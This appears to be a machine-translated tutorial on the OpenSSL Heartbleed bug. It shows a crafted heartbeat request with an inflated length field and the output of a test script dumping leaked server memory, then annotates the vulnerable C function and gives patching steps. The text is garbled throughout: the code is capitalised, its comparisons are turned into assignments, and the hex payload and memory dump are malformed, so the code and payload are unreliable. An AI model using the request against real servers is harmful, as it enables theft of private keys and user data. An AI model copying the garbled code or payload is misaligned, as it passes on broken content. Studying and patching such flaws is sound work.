OpenSSL painstaking Vulnerability

Recently, the hetbleed vulnerability has stirred up, as if it has once again pulled people back to their concerns and concerns about network security. More and more developed networks provide us with convenient work and life, and participate in our real world more and more deeply, and are closely linked with our vital interests. The core value of network security lies in information preservation. The main threats are information leakage and abuse. Today, let's take a simple look at this eye-catching vulnerability.
OpenSSL official vulnerability warning statement:

Heartbleed is actually a vulnerability in Heartbeat implementation, which is mainly used for SSL implementation. Since security is not considered at the beginning of the establishment of the Internet, the current security measures are to repair the original framework, such as IPSec, such as SSL, they primarily aim to provide confidentiality and integrity and authentication services for network communication. SSL is between the transport layer and the application layer. It is mainly used for public key-based identity authentication and private key-based ciphertext transmission. It is the most widely used Web application. Secondly, it is applied in all fields that require confidentiality, integrity, and authentication, such as IM, Email, and online payment, openSSL is a free and open-source implementation of SSL. The following analysis is based on the information collected on the network.
How SSL works:

Test and verification
Here we can get a general idea about the role of this vulnerability, so let's test it and see the results:
1. Construct a malicious request package:
HeartBeat Requst package
Hb = h2bin ("'
18 03 02 00 03
00, 0120
"')
Here, the blue 01 indicates that the package type is Heartbeat_Request. The next two bytes indicate the data length, which is 8192 in decimal format;
2. The server responds to the Heartbeat Request package:
[Root @ server] # python ssltest. py 127.0.0.1-p 9876> 1
Sending heartbeat request...
... Received message: type = 24, ver = 0302, length = 8211
Received heartbeat response:
WARNING: server returned more data than it shoshould-server is vulnerable!
Received heartbeat response:
Jun: 0220 00D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C ..... SC [... r...
0010: BC 2B 92 A8 48 97 cf bd 39 04 CC 16 0A 85 03 90... +... H... 9 .......
0020: 9F 77 04 33 D4 DE 00 66 C0 14 C0 0A C0 22 C0. Large... f .....".
0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !. 9. 8... 5.
Here, the blue color still indicates the type of the response packet. The last two bytes are the data length, and the green part contains the leaked memory data.
Source code analysis
Next, let's take a look at the source code of this vulnerability. This vulnerability mainly exists in the heartbeats processing functions dtls1_process_heartbeat and tls_process_heartbeat in the OpenSLL source file ssl/dsf-both.c and t1_lib.c, the following uses dtls1_process_heart as an example to analyze the problem:

 
 

  
  
# Ifndef OPENSSL_NO_HEARTBEATS

  
  
Int

  
  
Dtls1_process_heartbeat (SSL * s)

  
  
{
  
  
Unsigned char*P= &S->S3->Rrec.Data[0], *Pl; // Extract data from the received SSL heartbeat request package
  
  
Unsigned short hbtype;

  
  
Unsigned int payload;

  
  
Unsigned int padding = 16;/* Use minimum padding */

  
  


  
  
/* Read type and payload length first */

  
  
Hbtype= *P++; // Payload)

  
  
N2s(P,Payload);

  
  
Pl = p;

  
  


  
  
If (s-> msg_callback)

  
  
S-> msg_callback (0, s-> version, TLS1_RT_HEARTBEAT,

  
  
& S-> s3-> rrec. data [0], s-> s3-> rrec. length,

  
  
S, s-> msg_callback_arg );

  
  


  
  
If (hbtype = TLS1_HB_REQUEST)

  
  
{

  
  
Unsigned char * buffer, * bp;

  
  
Int r;

  
  


  
  
/* Allocate memory for the response, size is 1 byte

  
  
* Message type, plus 2 bytes payload length, plus

  
  
* Payload, plus padding

  
  
*/

  
  
Buffer=OPENSSL_malloc(1+2+Payload+Padding); // Allocate heap space according to the length field value in the request package

  
  
Bp = buffer;

  
  


  
  
/* Enter response type, length and copy payload */

  
  
* Bp ++ = TLS1_HB_RESPONSE;

  
  
S2n (payload, bp );

  
  
Memcpy(Bp,Pl,Payload); // Copy the data part of the request packet to the allocated heap space. However, note that the actual data part is far smaller than the length, therefore, using the memcpy function will copy your data in the adjacent space, up to 64 KB

  
  
Bp + = payload;

  
  
/* Random padding */

  
  
Rand_pseudo _ bytes (bp, padding );

  
  


  
  
R = dtls1_write_bytes (s, TLS1_RT_HEARTBEAT, buffer, 3 + payload + padding );

  
  


  
  
If (r> = 0 & s-> msg_callback)

  
  
S-> msg_callback (1, s-> version, TLS1_RT_HEARTBEAT,

  
  
Buffer, 3 + payload + padding,

  
  
S, s-> msg_callback_arg );

  
  


  
  
OPENSSL_free (buffer );

  
  


  
  
If (r <0)

  
  
Return r;

  
  
}

  
  
Else if (hbtype = TLS1_HB_RESPONSE)

  
  
{

  
  
Unsigned int seq;

  
  


  
  
/* We only send sequence numbers (2 bytes unsigned int ),

  
  
* And 16 random bytes, so we just try to read

  
  
* Sequence number */

  
  
N2s (pl, seq );

  
  


  
  
If (payload = 18 & seq = s-> tlsext_hb_seq)

  
  
{

  
  
Dtls1_stop_timer (s );

  
  
S-> tlsext_hb_seq ++;

  
  
S-> tlsext_hb_pending = 0;

  
  
}

  
  
}

  
  


  
  
Return 0;

  
  
}
 
 

The logic here is that the actual length of the data in the request packet is much smaller than the indicated length. The Server allocates a heap according to the indicated length, then we try to copy all the data in the request packet to form a response packet, So we copied the length bytes from the data in the request packet in the memory, it has far exceeded the actual length of the data, resulting in data leakage. In this way, you can obtain the private key of the Server used by SSL to obtain the SSL session key and user account information.
Remedy
It is not difficult to fix the problem. There are two approaches:
1. Update: The Heartbleed vulnerability affects only OpenSSL/TLS of a specific version. Therefore, you only need to Update it according to official notifications;
2. Recomplie: Re-compile OpenSSL, plus option parameters that do not use the heartbeat function:-DOPENSSL-NO-HEARTBEATS;
Then restart the WEB Service:
#/Etc/init. d/apache2 restart
#/Etc/init. d/ngnix restart
#/Etc/init. d/httpd restart
You also need to restart other services related to OpenSSL. You can use lsof | grep libssl | awk '{print $1}' | sourt | uniq to view services related to OpenSSL.